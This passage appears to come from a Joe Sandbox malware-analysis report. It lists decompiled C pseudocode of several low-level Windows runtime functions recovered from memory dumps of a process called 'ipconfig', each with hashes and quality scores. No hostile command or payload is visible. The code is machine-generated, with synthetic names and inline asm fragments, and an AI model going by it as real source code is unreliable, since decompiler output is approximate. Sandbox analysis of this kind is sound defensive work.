              					}
              					if((_t106 & 0x00000001) == 0) {
              						_t115 = 0x28;
              						_t122 = E02F2E7D3(_t115, _t124);
              						if(_t122 < 0) {
              							L9:
              							_push(_t124);
              							_push(0);
              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
              							goto L37;
              						}
              						L12:
              						if( *_t124 != 0) {
              							goto L18;
              						}
              						goto L13;
              					}
              					_t15 =  &(_t124[1]); // 0x4
              					_t117 = 4;
              					_t122 = E02F2E7D3(_t117, _t15);
              					if(_t122 >= 0) {
              						_t124[4] = _t124[4] | 0x00000001;
              						_v12 = _v12 & 0x00000000;
              						_push(4);
              						_push( &_v12);
              						_push(5);
              						_push(0xfffffffe);
              						E02ED95B0();
              						goto L12;
              					}
              					goto L9;
              				} else {
              					return 0xc0000017;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ab22c56647dd8d86c437f4516762ee11a7156084390673df3c0cf166ff384936
              • Instruction ID: 9730904940c45abd138bc83a6fd6559c12022d94fe537b7dc2074cd7eb2d49ad
              • Opcode Fuzzy Hash: ab22c56647dd8d86c437f4516762ee11a7156084390673df3c0cf166ff384936
              • Instruction Fuzzy Hash: A7713132640711AFD731CF14CC44F66B7A6EF417A8F108928EB559B6E0DB71E949CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E02F16DC9(signed int __ecx, void* __edx) {
              				unsigned int _v8;
              				intOrPtr _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				char _v32;
              				char _v36;
              				char _v40;
              				char _v44;
              				char _v48;
              				char _v52;
              				char _v56;
              				char _v60;
              				void* _t87;
              				void* _t95;
              				signed char* _t96;
              				signed int _t107;
              				signed int _t136;
              				signed char* _t137;
              				void* _t157;
              				void* _t161;
              				void* _t167;
              				intOrPtr _t168;
              				void* _t174;
              				void* _t175;
              				signed int _t176;
              				void* _t177;
              
              				_t136 = __ecx;
              				_v44 = 0;
              				_t167 = __edx;
              				_v40 = 0;
              				_v36 = 0;
              				_v32 = 0;
              				_v60 = 0;
              				_v56 = 0;
              				_v52 = 0;
              				_v48 = 0;
              				_v16 = __ecx;
              				_t87 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
              				_t175 = _t87;
              				if(_t175 != 0) {
              					_t11 = _t175 + 0x30; // 0x30
              					 *((short*)(_t175 + 6)) = 0x14d4;
              					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
              					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
              					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
              					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
              					E02F16B4C(_t167, _t11, 0x214,  &_v8);
              					_v12 = _v8 + 0x10;
              					_t95 = E02EB7D50();
              					_t137 = 0x7ffe0384;
              					if(_t95 == 0) {
              						_t96 = 0x7ffe0384;
              					} else {
              						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              					}
              					_push(_t175);
              					_push(_v12);
              					_push(0x402);
              					_push( *_t96 & 0x000000ff);
              					E02ED9AE0();
              					_t87 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
              					_t176 = _v16;
              					if((_t176 & 0x00000100) != 0) {
              						_push( &_v36);
              						_t157 = 4;
              						_t87 = E02F1795D( *((intOrPtr*)(_t167 + 8)), _t157);
              						if(_t87 >= 0) {
              							_v24 = E02F1795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
              							_v28 = E02F1795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
              							_push( &_v52);
              							_t161 = 5;
              							_t168 = E02F1795D( *((intOrPtr*)(_t167 + 8)), _t161);
              							_v20 = _t168;
              							_t107 = L02EB4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
              							_v16 = _t107;
              							if(_t107 != 0) {
              								_v8 = _v8 & 0x00000000;
              								 *(_t107 + 0x20) = _t176;
              								 *((short*)(_t107 + 6)) = 0x14d5;
              								_t47 = _t107 + 0x24; // 0x24
              								_t177 = _t47;
              								E02F16B4C( &_v36, _t177, 0xc78,  &_v8);
              								_t51 = _v8 + 4; // 0x4
              								_t178 = _t177 + (_v8 >> 1) * 2;
              								_v12 = _t51;
              								E02F16B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
              								_v12 = _v12 + _v8;
              								E02F16B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
              								_t125 = _v8;
              								_v12 = _v12 + _v8;
              								E02F16B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
              								_t174 = _v12 + _v8;
              								if(E02EB7D50() != 0) {
              									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              								}
              								_push(_v16);
              								_push(_t174);
              								_push(0x402);
              								_push( *_t137 & 0x000000ff);
              								E02ED9AE0();
              								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
              								_t168 = _v20;
              							}
              							_t87 = L02EB2400( &_v36);
              							if(_v24 >= 0) {
              								_t87 = L02EB2400( &_v44);
              							}
              							if(_t168 >= 0) {
              								_t87 = L02EB2400( &_v52);
              							}
              							if(_v28 >= 0) {
              								return L02EB2400( &_v60);
              							}
              						}
              					}
              				}
              				return _t87;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
              • Instruction ID: 02c34c98ccee29e7e5312389d1a64c7d631c5074f497b93387fde1decb842c9c
              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
              • Instruction Fuzzy Hash: 54716E71E00219AFCB11DFA4C984AEEFBB9FF48754F504569E605E7250DB30AA41CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E02E952A5(char __ecx) {
              				char _v20;
              				char _v28;
              				char _v29;
              				void* _v32;
              				void* _v36;
              				void* _v37;
              				void* _v38;
              				void* _v40;
              				void* _v46;
              				void* _v64;
              				void* __ebx;
              				intOrPtr* _t49;
              				signed int _t53;
              				short _t85;
              				signed int _t87;
              				signed int _t88;
              				signed int _t89;
              				intOrPtr _t101;
              				intOrPtr* _t102;
              				intOrPtr* _t104;
              				signed int _t106;
              				void* _t108;
              
              				_t93 = __ecx;
              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
              				_push(_t88);
              				_v29 = __ecx;
              				_t89 = _t88 | 0xffffffff;
              				while(1) {
              					E02EAEEF0(0x2f879a0);
              					_t104 =  *0x2f88210; // 0x402bd8
              					if(_t104 == 0) {
              						break;
              					}
              					asm("lock inc dword [esi]");
              					_t2 = _t104 + 8; // 0x28000000
              					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
              					E02EAEB70(_t93, 0x2f879a0);
              					if( *((char*)(_t108 + 0xf)) != 0) {
              						_t101 =  *0x7ffe02dc;
              						__eflags =  *(_t104 + 0x14) & 0x00000001;
              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
              							L9:
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0x90028);
              							_push(_t108 + 0x20);
              							_push(0);
              							_push(0);
              							_push(0);
              							_t10 = _t104 + 4; // 0x0
              							_push( *_t10);
              							_t53 = E02ED9890();
              							__eflags = _t53;
              							if(_t53 >= 0) {
              								__eflags =  *(_t104 + 0x14) & 0x00000001;
              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
              									E02EAEEF0(0x2f879a0);
              									 *((intOrPtr*)(_t104 + 8)) = _t101;
              									E02EAEB70(0, 0x2f879a0);
              								}
              								goto L3;
              							}
              							__eflags = _t53 - 0xc0000012;
              							if(__eflags == 0) {
              								L12:
              								_t11 = _t104 + 0xe; // 0x402bf002
              								_t13 = _t104 + 0xc; // 0x402be5
              								_t93 = _t13;
              								 *((char*)(_t108 + 0x12)) = 0;
              								__eflags = E02ECF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
              								if(__eflags >= 0) {
              									L15:
              									_t102 = _v28;
              									 *_t102 = 2;
              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
              									E02EAEEF0(0x2f879a0);
              									__eflags =  *0x2f88210 - _t104; // 0x402bd8
              									if(__eflags == 0) {
              										__eflags =  *((char*)(_t108 + 0xe));
              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
              										 *0x2f88210 = _t102;
              										_t32 = _t102 + 0xc; // 0x0
              										 *_t95 =  *_t32;
              										_t33 = _t102 + 0x10; // 0x0
              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
              										_t35 = _t102 + 4; // 0xffffffff
              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
              										if(__eflags != 0) {
              											_t37 = _t104 + 0x10; // 0x2000402b
              											_t95 =  *((intOrPtr*)( *_t37));
              											E02F14888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
              										}
              										E02EAEB70(_t95, 0x2f879a0);
              										asm("lock xadd [esi], eax");
              										if(__eflags == 0) {
              											_t38 = _t104 + 4; // 0x0
              											_push( *_t38);
              											E02ED95D0();
              											L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
              										}
              										asm("lock xadd [esi], ebx");
              										__eflags = _t89 == 1;
              										if(_t89 == 1) {
              											_t41 = _t104 + 4; // 0x0
              											_push( *_t41);
              											E02ED95D0();
              											L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
              										}
              										_t49 = _t102;
              										L4:
              										return _t49;
              									}
              									E02EAEB70(_t93, 0x2f879a0);
              									asm("lock xadd [esi], eax");
              									if(__eflags == 0) {
              										_t25 = _t104 + 4; // 0x0
              										_push( *_t25);
              										E02ED95D0();
              										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
              									}
              									 *_t102 = 1;
              									asm("lock xadd [edi], eax");
              									if(__eflags == 0) {
              										_t28 = _t102 + 4; // 0xffffffff
              										_push( *_t28);
              										E02ED95D0();
              										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
              									}
              									continue;
              								}
              								_t15 = _t104 + 0x10; // 0x2000402b
              								_t93 =  &_v20;
              								_t17 = _t104 + 0xe; // 0x402bf002
              								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
              								_t85 = 6;
              								_v20 = _t85;
              								_t87 = E02ECF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
              								__eflags = _t87;
              								if(_t87 < 0) {
              									goto L3;
              								}
              								 *((char*)(_t108 + 0xe)) = 1;
              								goto L15;
              							}
              							__eflags = _t53 - 0xc000026e;
              							if(__eflags != 0) {
              								goto L3;
              							}
              							goto L12;
              						}
              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
              							goto L3;
              						} else {
              							goto L9;
              						}
              					}
              					L3:
              					_t49 = _t104;
              					goto L4;
              				}
              				_t49 = 0;
              				goto L4;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7c07da043e10b617b906a6a28664710e33a316e6a50c16f35d320656eb2ad32
              • Instruction ID: 6c2a0702aaf429b7ad3288f4e24a502c83a484925fce46306af111fc209465b3
              • Opcode Fuzzy Hash: f7c07da043e10b617b906a6a28664710e33a316e6a50c16f35d320656eb2ad32
              • Instruction Fuzzy Hash: E651FE31285341ABD722EF24C851B27FBE5FF84714F24992EF59987A51E770E804CB92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02EC2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
              				signed short* _v8;
              				signed short* _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr* _v28;
              				signed int _v32;
              				signed int _v36;
              				short _t56;
              				signed int _t57;
              				intOrPtr _t58;
              				signed short* _t61;
              				intOrPtr _t72;
              				intOrPtr _t75;
              				intOrPtr _t84;
              				intOrPtr _t87;
              				intOrPtr* _t90;
              				signed short* _t91;
              				signed int _t95;
              				signed short* _t96;
              				intOrPtr _t97;
              				intOrPtr _t102;
              				signed int _t108;
              				intOrPtr _t110;
              				signed int _t111;
              				signed short* _t112;
              				void* _t113;
              				signed int _t116;
              				signed short** _t119;
              				short* _t120;
              				signed int _t123;
              				signed int _t124;
              				void* _t125;
              				intOrPtr _t127;
              				signed int _t128;
              
              				_t90 = __ecx;
              				_v16 = __edx;
              				_t108 = _a4;
              				_v28 = __ecx;
              				_t4 = _t108 - 1; // -1
              				if(_t4 > 0x13) {
              					L15:
              					_t56 = 0xc0000100;
              					L16:
              					return _t56;
              				}
              				_t57 = _t108 * 0x1c;
              				_v32 = _t57;
              				_t6 = _t57 + 0x2f88204; // 0x0
              				_t123 =  *_t6;
              				_t7 = _t57 + 0x2f88208; // 0x2f88207
              				_t8 = _t57 + 0x2f88208; // 0x2f88207
              				_t119 = _t8;
              				_v36 = _t123;
              				_t110 = _t7 + _t123 * 8;
              				_v24 = _t110;
              				_t111 = _a4;
              				if(_t119 >= _t110) {
              					L12:
              					if(_t123 != 3) {
              						_t58 =  *0x2f88450; // 0x4010fc
              						if(_t58 == 0) {
              							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
              						}
              					} else {
              						_t26 = _t57 + 0x2f8821c; // 0x0
              						_t58 =  *_t26;
              					}
              					 *_t90 = _t58;
              					goto L15;
              				} else {
              					goto L2;
              				}
              				while(1) {
              					_t116 =  *_t61 & 0x0000ffff;
              					_t128 =  *(_t127 + _t61) & 0x0000ffff;
              					if(_t116 == _t128) {
              						goto L18;
              					}
              					L5:
              					if(_t116 >= 0x61) {
              						if(_t116 > 0x7a) {
              							_t97 =  *0x2f86d5c; // 0x7f250654
              							_t72 =  *0x2f86d5c; // 0x7f250654
              							_t75 =  *0x2f86d5c; // 0x7f250654
              							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
              						} else {
              							_t116 = _t116 - 0x20;
              						}
              					}
              					if(_t128 >= 0x61) {
              						if(_t128 > 0x7a) {
              							_t102 =  *0x2f86d5c; // 0x7f250654
              							_t84 =  *0x2f86d5c; // 0x7f250654
              							_t87 =  *0x2f86d5c; // 0x7f250654
              							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
              						} else {
              							_t128 = _t128 - 0x20;
              						}
              					}
              					if(_t116 == _t128) {
              						_t61 = _v12;
              						_t96 = _v8;
              					} else {
              						_t113 = _t116 - _t128;
              						L9:
              						_t111 = _a4;
              						if(_t113 == 0) {
              							_t115 =  &(( *_t119)[_t111 + 1]);
              							_t33 =  &(_t119[1]); // 0x100
              							_t120 = _a8;
              							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
              							_t35 = _t95 - 1; // 0xff
              							_t124 = _t35;
              							if(_t120 == 0) {
              								L27:
              								 *_a16 = _t95;
              								_t56 = 0xc0000023;
              								goto L16;
              							}
              							if(_t124 >= _a12) {
              								if(_a12 >= 1) {
              									 *_t120 = 0;
              								}
              								goto L27;
              							}
              							 *_a16 = _t124;
              							_t125 = _t124 + _t124;
              							E02EDF3E0(_t120, _t115, _t125);
              							_t56 = 0;
              							 *((short*)(_t125 + _t120)) = 0;
              							goto L16;
              						}
              						_t119 =  &(_t119[2]);
              						if(_t119 < _v24) {
              							L2:
              							_t91 =  *_t119;
              							_t61 = _t91;
              							_v12 = _t61;
              							_t112 =  &(_t61[_t111]);
              							_v8 = _t112;
              							if(_t61 >= _t112) {
              								break;
              							} else {
              								_t127 = _v16 - _t91;
              								_t96 = _t112;
              								_v20 = _t127;
              								_t116 =  *_t61 & 0x0000ffff;
              								_t128 =  *(_t127 + _t61) & 0x0000ffff;
              								if(_t116 == _t128) {
              									goto L18;
              								}
              								goto L5;
              							}
              						} else {
              							_t90 = _v28;
              							_t57 = _v32;
              							_t123 = _v36;
              							goto L12;
              						}
              					}
              					L18:
              					_t61 =  &(_t61[1]);
              					_v12 = _t61;
              					if(_t61 >= _t96) {
              						break;
              					}
              					_t127 = _v20;
              				}
              				_t113 = 0;
              				goto L9;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44c59c5d846d88f33473eb7f75186afdce118e6e3988fb62e224e0ae2bf3fbc6
              • Instruction ID: f8bcbe2c46f96ece2508641c84dee14193e93dbf667d9673d4f9b83903d9bc27
              • Opcode Fuzzy Hash: 44c59c5d846d88f33473eb7f75186afdce118e6e3988fb62e224e0ae2bf3fbc6
              • Instruction Fuzzy Hash: 2F51CF76A405198FCB18CF69C9A09BDB7B1FB88704726D45EED46DB310E730AE52CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E02F5AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
              				signed int _v8;
              				signed int _v12;
              				void* __esi;
              				void* __ebp;
              				signed short* _t36;
              				signed int _t41;
              				char* _t42;
              				intOrPtr _t43;
              				signed int _t47;
              				void* _t52;
              				signed int _t57;
              				intOrPtr _t61;
              				signed char _t62;
              				signed int _t72;
              				signed char _t85;
              				signed int _t88;
              
              				_t73 = __edx;
              				_push(__ecx);
              				_t85 = __ecx;
              				_v8 = __edx;
              				_t61 =  *((intOrPtr*)(__ecx + 0x28));
              				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
              				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
              					_t57 = _t57 | 0x00000001;
              				}
              				_t88 = 0;
              				_t36 = 0;
              				_t96 = _a12;
              				if(_a12 == 0) {
              					_t62 = _a8;
              					__eflags = _t62;
              					if(__eflags == 0) {
              						goto L12;
              					}
              					_t52 = E02F5C38B(_t85, _t73, _t57, 0);
              					_t62 = _a8;
              					 *_t62 = _t52;
              					_t36 = 0;
              					goto L11;
              				} else {
              					_t36 = E02F5ACFD(_t85, _t73, _t96, _t57, _a8);
              					if(0 == 0 || 0 == 0xffffffff) {
              						_t72 = _t88;
              					} else {
              						_t72 =  *0x00000000 & 0x0000ffff;
              					}
              					 *_a12 = _t72;
              					_t62 = _a8;
              					L11:
              					_t73 = _v8;
              					L12:
              					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
              						L19:
              						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
              							L22:
              							_t74 = _v8;
              							__eflags = _v8;
              							if(__eflags != 0) {
              								L25:
              								__eflags = _t88 - 2;
              								if(_t88 != 2) {
              									__eflags = _t85 + 0x44 + (_t88 << 6);
              									_t88 = E02F5FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
              									goto L34;
              								}
              								L26:
              								_t59 = _v8;
              								E02F5EA55(_t85, _v8, _t57);
              								asm("sbb esi, esi");
              								_t88 =  ~_t88;
              								_t41 = E02EB7D50();
              								__eflags = _t41;
              								if(_t41 == 0) {
              									_t42 = 0x7ffe0380;
              								} else {
              									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              								}
              								__eflags =  *_t42;
              								if( *_t42 != 0) {
              									_t43 =  *[fs:0x30];
              									__eflags =  *(_t43 + 0x240) & 0x00000001;
              									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
              										__eflags = _t88;
              										if(_t88 != 0) {
              											E02F51608(_t85, _t59, 3);
              										}
              									}
              								}
              								goto L34;
              							}
              							_push(_t62);
              							_t47 = E02F61536(0x2f88ae4, (_t74 -  *0x2f88b04 >> 0x14) + (_t74 -  *0x2f88b04 >> 0x14), _t88, __eflags);
              							__eflags = _t47;
              							if(_t47 == 0) {
              								goto L26;
              							}
              							_t74 = _v12;
              							_t27 = _t47 - 1; // -1
              							_t88 = _t27;
              							goto L25;
              						}
              						_t62 = _t85;
              						if(L02F5C323(_t62, _v8, _t57) != 0xffffffff) {
              							goto L22;
              						}
              						_push(_t62);
              						_push(_t88);
              						E02F5A80D(_t85, 9, _v8, _t88);
              						goto L34;
              					} else {
              						_t101 = _t36;
              						if(_t36 != 0) {
              							L16:
              							if(_t36 == 0xffffffff) {
              								goto L19;
              							}
              							_t62 =  *((intOrPtr*)(_t36 + 2));
              							if((_t62 & 0x0000000f) == 0) {
              								goto L19;
              							}
              							_t62 = _t62 & 0xf;
              							if(E02F3CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
              								L34:
              								return _t88;
              							}
              							goto L19;
              						}
              						_t62 = _t85;
              						_t36 = E02F5ACFD(_t62, _t73, _t101, _t57, _t62);
              						if(_t36 == 0) {
              							goto L19;
              						}
              						goto L16;
              					}
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 895722233523a7e4bc41d0097df45c2d9e835927447e502f0730d03ca9b5cc0f
              • Instruction ID: d902b72b3393163e7868abed84a7c0bbb1904a9d8aefab9a0ea316248f4ade63
              • Opcode Fuzzy Hash: 895722233523a7e4bc41d0097df45c2d9e835927447e502f0730d03ca9b5cc0f
              • Instruction Fuzzy Hash: F741E572B006215BC7269A26CC94B3BB7DAAF847E4F044319FF5687290D734D821CAA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E02EBDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
              				char _v5;
              				signed int _v12;
              				signed int* _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				intOrPtr _v44;
              				void* __ebx;
              				void* __edi;
              				signed int _t54;
              				char* _t58;
              				signed int _t66;
              				intOrPtr _t67;
              				intOrPtr _t68;
              				intOrPtr _t72;
              				intOrPtr _t73;
              				signed int* _t75;
              				intOrPtr _t79;
              				intOrPtr _t80;
              				char _t82;
              				signed int _t83;
              				signed int _t84;
              				signed int _t88;
              				signed int _t89;
              				intOrPtr _t90;
              				intOrPtr _t92;
              				signed int _t97;
              				intOrPtr _t98;
              				intOrPtr* _t99;
              				signed int* _t101;
              				signed int* _t102;
              				intOrPtr* _t103;
              				intOrPtr _t105;
              				signed int _t106;
              				void* _t118;
              
              				_t92 = __edx;
              				_t75 = _a4;
              				_t98 = __ecx;
              				_v44 = __edx;
              				_t106 = _t75[1];
              				_v40 = __ecx;
              				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
              					_t82 = 0;
              				} else {
              					_t82 = 1;
              				}
              				_v5 = _t82;
              				_t6 = _t98 + 0xc8; // 0xc9
              				_t101 = _t6;
              				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
              				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
              				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
              				if(_t82 != 0) {
              					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
              					_t83 =  *_t75;
              					_t54 = _t75[1];
              					 *_t101 = _t83;
              					_t84 = _t83 | _t54;
              					_t101[1] = _t54;
              					if(_t84 == 0) {
              						_t101[1] = _t101[1] & _t84;
              						 *_t101 = 1;
              					}
              					goto L19;
              				} else {
              					if(_t101 == 0) {
              						E02E9CC50(E02E94510(0xc000000d));
              						_t88 =  *_t101;
              						_t97 = _t101[1];
              						L15:
              						_v12 = _t88;
              						_t66 = _t88 -  *_t75;
              						_t89 = _t97;
              						asm("sbb ecx, [ebx+0x4]");
              						_t118 = _t89 - _t97;
              						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
              							_t66 = _t66 | 0xffffffff;
              							_t89 = 0x7fffffff;
              						}
              						 *_t101 = _t66;
              						_t101[1] = _t89;
              						L19:
              						if(E02EB7D50() != 0) {
              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              						} else {
              							_t58 = 0x7ffe0386;
              						}
              						_t102 = _v16;
              						if( *_t58 != 0) {
              							_t58 = E02F68ED6(_t102, _t98);
              						}
              						_t76 = _v44;
              						E02EB2280(_t58, _v44);
              						E02EBDD82(_v44, _t102, _t98);
              						E02EBB944(_t102, _v5);
              						return E02EAFFB0(_t76, _t98, _t76);
              					}
              					_t99 = 0x7ffe03b0;
              					do {
              						_t103 = 0x7ffe0010;
              						do {
              							_t67 =  *0x2f88628; // 0x0
              							_v28 = _t67;
              							_t68 =  *0x2f8862c; // 0x0
              							_v32 = _t68;
              							_v24 =  *((intOrPtr*)(_t99 + 4));
              							_v20 =  *_t99;
              							while(1) {
              								_t97 =  *0x7ffe000c;
              								_t90 =  *0x7FFE0008;
              								if(_t97 ==  *_t103) {
              									goto L10;
              								}
              								asm("pause");
              							}
              							L10:
              							_t79 = _v24;
              							_t99 = 0x7ffe03b0;
              							_v12 =  *0x7ffe03b0;
              							_t72 =  *0x7FFE03B4;
              							_t103 = 0x7ffe0010;
              							_v36 = _t72;
              						} while (_v20 != _v12 || _t79 != _t72);
              						_t73 =  *0x2f88628; // 0x0
              						_t105 = _v28;
              						_t80 =  *0x2f8862c; // 0x0
              					} while (_t105 != _t73 || _v32 != _t80);
              					_t98 = _v40;
              					asm("sbb edx, [ebp-0x20]");
              					_t88 = _t90 - _v12 - _t105;
              					_t75 = _a4;
              					asm("sbb edx, eax");
              					_t31 = _t98 + 0xc8; // 0x2f5fb53
              					_t101 = _t31;
              					 *_t101 = _t88;
              					_t101[1] = _t97;
              					goto L15;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0783c6e2a3ff1dafaf5653e58cd957f2dae1cc53159c3fb2c5452ea37da65446
              • Instruction ID: fbe62848ac044fa7f0f8063db172af5c13faa672786679ea8fc3dbaa97b800c3
